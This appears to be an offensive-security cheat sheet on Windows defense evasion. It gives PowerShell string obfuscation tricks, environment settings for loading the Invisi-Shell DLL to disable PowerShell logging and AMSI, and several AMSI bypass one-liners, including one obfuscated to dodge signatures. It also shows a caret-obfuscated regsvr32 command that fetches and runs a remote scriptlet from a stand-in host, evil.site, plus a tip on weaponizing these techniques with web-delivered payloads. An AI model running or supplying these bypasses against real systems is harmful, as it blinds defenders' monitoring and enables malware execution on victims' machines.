Defense Evasion

Techniques to bypass defensive measures that might exist on a Windows system.


PowerShell

String Token Manipulation

Obfuscate simple PowerShell scripts using the following string token manipulation technique:

Write-Host "Who am I?"
Write-Host ("{2}{0}{1}"-f'o am',' I?','Wh')

This also works on simple commands using the call operator (&):

whoami
&("{0}{1}{2}"-f'who','am','i')

Or even on more complex cmdlets requiring arguments using IEX:

IEX "Write-Host Who am I?"
IEX (("{2}{1}{0}"-f'ost','te-H','Wri') + " " + ("{2}{0}{1}"-f'o am',' I?','Wh'))
Invisi-Shell

Bypass all PowerShell security features by hooking the related .NET functions with a single DLL and making them ineffective. This effectively disables all logging features in addition to AMSI. Requires to drop a DLL file on the target filesystem.

$env:COR_ENABLE_PROFILING="1"
$env:COR_PROFILER="{cf0d821e-299b-5307-a3d8-b283c03916db}"
$env:COR_PROFILER_PATH="\path\to\invisishell.dll"

cmd.exe /k "powershell.exe -w hidden -nop -c [PowerShell]"

Remove-Item env:COR_ENABLE_PROFILING
Remove-Item env:COR_PROFILER
Remove-Item env:COR_PROFILER_PATH

Binary: invisi-shell.dll

Tip

Weaponize this technique by executing the stager and payload via web delivery (see personal projects).

Sources:

Anti-Malware Scan Interface (AMSI)

AMSI sends the strings interpreted by Windows scripting engines (PowerShell, VBS) to anti-virus signature based systems.

Matt Graeber (@mattifestation)

Sets the amsiInitFailed flag to true to emulate a failure when loading amsi.dll.

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null,$true)

Tip

Working obfuscation as of 22/10/2018:

[Ref].Assembly.GetType(("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}"-f'Sy','ste','m.M','anage','men','t.Au','tomat','ion.A','m','s','iU','til','s')).GetField(("{0}{1}{2}{3}{4}{5}"-f'am','si','I','nitF','ail','ed'), 'NonPublic,Static').SetValue($null,$true)
Others (not tested)
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)
[ScriptBlock]."GetField"('signatures','NonPublic,Static').SetValue($NULL,(New-Object Collections.Generic.HashSet[string]))

CMD Obfuscation

Use the ^ char everywhere in a malicious CMD command to evade AV signatures.

Example:

r^E^g^S^v^R^3^2 /^s /^n /^u /^i:http://evil.site/policy.sct s^C^r^O^b^j.D^l^L